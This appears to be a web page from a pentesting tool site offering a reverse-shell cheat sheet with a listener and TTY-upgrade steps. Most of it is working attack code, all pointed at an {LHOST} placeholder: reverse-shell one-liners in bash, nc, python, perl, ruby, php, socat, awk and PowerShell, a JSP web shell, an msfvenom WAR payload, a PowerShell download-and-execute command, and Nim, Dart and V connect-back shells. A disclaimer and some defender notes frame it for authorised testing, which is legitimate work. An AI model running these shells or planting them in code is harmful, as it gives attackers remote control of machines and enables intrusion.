// Tools
Reverse shells, bind shells, web shells, MSFVenom, PowerShell, encoders and file-transfer one-liners — with live LHOST/LPORT substitution, matching listeners, TTY upgrade steps, and educational breakdowns.
For authorized security testing, CTF play and educational use only. You are responsible for ensuring you have permission to test any system you target. KnightSec assumes no liability for misuse.
// Shells that connect back to your listener. Requires an outbound connection from the target — TCP for most entries, UDP for the /dev/udp and ncat --udp variants.
bash -i >& /dev/tcp/{LHOST}/4444 0>&1exec 196<>/dev/tcp/{LHOST}/4444; bash <&196 >&196 2>&196mkfifo /tmp/f; bash -i <>/tmp/f 2>&1 | nc {LHOST} 4444 >/tmp/f; rm /tmp/fbash -i >& /dev/udp/{LHOST}/4444 0>&10<&196; exec 196<>/dev/tcp/{LHOST}/4444; sh <&196 >&196 2>&196rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc {LHOST} 4444 > /tmp/fbusybox nc {LHOST} 4444 -e shpython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{LHOST}",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{LHOST}",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'export RHOST="{LHOST}"; export RPORT=4444; python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("{LHOST}",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'perl -e 'use Socket;$i="{LHOST}";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"{LHOST}:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'ruby -rsocket -e'f=TCPSocket.open("{LHOST}",4444).to_i;exec sprintf("/bin/bash -i <&%d >&%d 2>&%d",f,f,f)'ruby -rsocket -e 'exit if fork;c=TCPSocket.new("{LHOST}","4444");$stdin.reopen(c);$stdout.reopen(c);$stderr.reopen(c);$stdin.each_line{|l|l=l.strip;next if l.empty?;(IO.popen(l,&method(:print))rescue nil)}'php -r '$sock=fsockopen("{LHOST}",4444);exec("/bin/bash -i <&3 >&3 2>&3");'php -r '$sock=fsockopen("{LHOST}",4444);passthru("/bin/bash -i <&3 >&3 
2>&3");'php -r '$sock=fsockopen("{LHOST}",4444);system("/bin/bash -i <&3 >&3 2>&3");'php -r '$sock=fsockopen("{LHOST}",4444);popen("/bin/bash -i <&3 >&3 2>&3","r");'nc -e /bin/bash {LHOST} 4444rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc {LHOST} 4444 > /tmp/fncat {LHOST} 4444 -e /bin/bashncat --udp {LHOST} 4444 -e /bin/bashTF=$(mktemp -u); mkfifo $TF && telnet {LHOST} 4444 0<$TF | /bin/bash 1>$TFmkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect {LHOST}:4444 > /tmp/s; rm /tmp/ssocat TCP:{LHOST}:4444 EXEC:/bin/bashsocat TCP:{LHOST}:4444 EXEC:'/bin/bash,pty,stderr,setsid,sigint,sane'awk 'BEGIN{s="/inet/tcp/0/{LHOST}/4444";while(42){do{printf"$ "|&s;s|&getline c;if(c){while((c|&getline)>0)print$0|&s;close(c)}}while(c!="exit")close(s)}}' /dev/nulllua5.1 -e 'local h,p="{LHOST}",4444;local s=require("socket");local t=s.tcp();t:connect(h,p);while true do local c,_=t:receive();if not c then break end;local f=io.popen(c,"r");local r=f:read("*a");f:close();t:send(r)end;t:close()'echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","{LHOST}:4444");cmd:=exec.Command("/bin/bash");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/r.go && go run /tmp/r.go &Runtime r=Runtime.getRuntime();Process p=r.exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/{LHOST}/4444;cat <&5 | while read line; do $line 2>&5 >&5; done"});p.waitFor();String[] c={"/bin/bash","-c","exec 5<>/dev/tcp/{LHOST}/4444;cat <&5|while read l;do $l 2>&5 >&5;done"};ProcessBuilder pb=new ProcessBuilder(c);pb.redirectErrorStream(true);pb.start().waitFor();msfvenom -p java/shell_reverse_tcp LHOST={LHOST} LPORT=4444 -f war -o shell.war<%@ page import="java.io.*,java.net.*" %>
<%
// Connect-back shell bridge: spawns an interactive bash, opens one outbound
// socket to the listener, and shuttles bytes between the two by polling.
// Defender note: a JSP/WAR whose servlet thread spawns /bin/bash and holds a
// non-HTTP outbound connection is the artifact to hunt for on the container
// (java process with a bash child plus an unexpected outbound socket).
String host = "{LHOST}";
int port = 4444;
Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-i"});
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
// Poll loop: copies whatever is currently buffered in each direction, then
// sleeps 50 ms. There is no blocking read, so latency is bounded by the sleep.
while (!s.isClosed()) {
  while (pi.available() > 0) so.write(pi.read());   // bash stdout -> socket
  while (pe.available() > 0) so.write(pe.read());   // bash stderr -> socket
  while (si.available() > 0) po.write(si.read());   // socket -> bash stdin
  so.flush(); po.flush();
  Thread.sleep(50);
  // exitValue() throws IllegalThreadStateException while bash is still
  // running, so the catch is the "still alive" path and break means exited.
  try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy(); s.close();
%>powershell -nop -w hidden -c "$c=New-Object Net.Sockets.TcpClient('{LHOST}',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$r2=$r+'PS '+(pwd).Path+'> ';$rb=([text.encoding]::ASCII).GetBytes($r2);$s.Write($rb,0,$rb.Length);$s.Flush()};$c.Close()"powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://{LHOST}:4444/shell.ps1')"powershell -nop -w hidden -enc {PS-B64}# nim c -r shell.nim
import net, os, osproc, strutils
# Connect-back command loop: opens one outbound TCP connection to the
# listener, then runs each received line through execCmdEx and sends the
# captured output back. Defender note: the host-side artifact is a freshly
# built binary holding a long-lived non-browser connection while spawning
# shell commands as child processes.
let s = newSocket()
s.connect("{LHOST}", Port(4444))   # connect back; raises OSError if unreachable
while true:
  let cmd = s.recvLine()           # one command per line from the listener
  # blank lines are skipped; recvLine also yields "" once the peer is gone, so
  # this loop has no exit of its own and only ends if send/recv raise
  if cmd.strip() == "": continue
  # runs via the platform shell and captures the output (stderr is merged into
  # stdout by execCmdEx's defaults); the exit code is discarded
  let (output, _) = execCmdEx(cmd.strip())
  s.send(output)                   # raw output only, no prompt
s.close()
// dart run shell.dart
import 'dart:io';
import 'dart:convert';
void main() {
  // Connect-back: one outbound TCP connection; every chunk received from the
  // listener is decoded as UTF-8 and written to the stdin of a *new* bash
  // process, whose stdout/stderr are piped back into the socket. Because bash
  // is started per chunk, nothing (cwd, variables) persists between commands.
  // Defender note: a dart process with bash children and an outbound
  // connection to an unusual port is the behavioural signature here.
  Socket.connect('{LHOST}', 4444).then((s) {
    s.listen((data) {
      Process.start('/bin/bash', []).then((p) {
        p.stdin.writeln(utf8.decode(data));   // the whole chunk as one line
        p.stdout.pipe(s);
        p.stderr.pipe(s);
      });
    });
  });
}// v run shell.v
import net
import os
fn main() {
	// Connect-back command loop: dial the listener once, then read one line at
	// a time, run it with os.execute and write the captured output back.
	// Defender note: a long-lived outbound connection from a freshly built
	// binary that spawns a command per received line.
	mut s := net.dial_tcp('{LHOST}:4444') or { panic(err) }
	for {
		line := s.read_line()
		if line == '' { break } // an empty line ends the loop (presumably also on disconnect)
		res := os.execute(line.trim_space()) // runs the command and captures its output
		s.write_string(res.output) or {} // write errors are silently ignored
	}
}// Listener
rlwrap -cAr nc -lvnp 4444
rlwrap adds readline support (↑↓ history, Ctrl-A/E). Best default.
// TTY Upgrade
A raw nc shell has no job control, no arrow keys, and Ctrl-C kills the listener. Run these steps after catching the shell to upgrade it.
python3 -c 'import pty;pty.spawn("/bin/bash")'
Why: Python's `pty` module allocates a real pseudo-terminal. Once the remaining steps are done, tab completion and arrow keys work inside the shell.
Ctrl-Z
Why: Suspends the nc listener in your local terminal (and the remote shell attached to it) and returns you to your local prompt so you can change your terminal's settings.
stty raw -echo; fg
Why: Run in your local terminal. `stty raw` passes every keystroke (including Ctrl-C) directly to the remote. `-echo` stops your local terminal from echoing characters. `fg` brings the backgrounded listener back to the foreground. Your local terminal stays in raw mode after the session ends; run `reset` to restore it.
export TERM=xterm-256color
Why: Run in the remote shell. Tells programs on the remote what the terminal supports — colours, cursor movement, clear screen. Required for vim, htop, less, and any tool that uses ncurses.
stty rows 40 columns 180
Why: Run in the remote shell. Sets the remote shell's idea of the terminal dimensions to match your actual window (180×40). Without this, line-wrapping and pager output will be misaligned. Run `stty size` locally first to verify.
Step 05 dimensions (180×40) are estimated from your current browser window. Run stty size in your local terminal for the exact values before copying.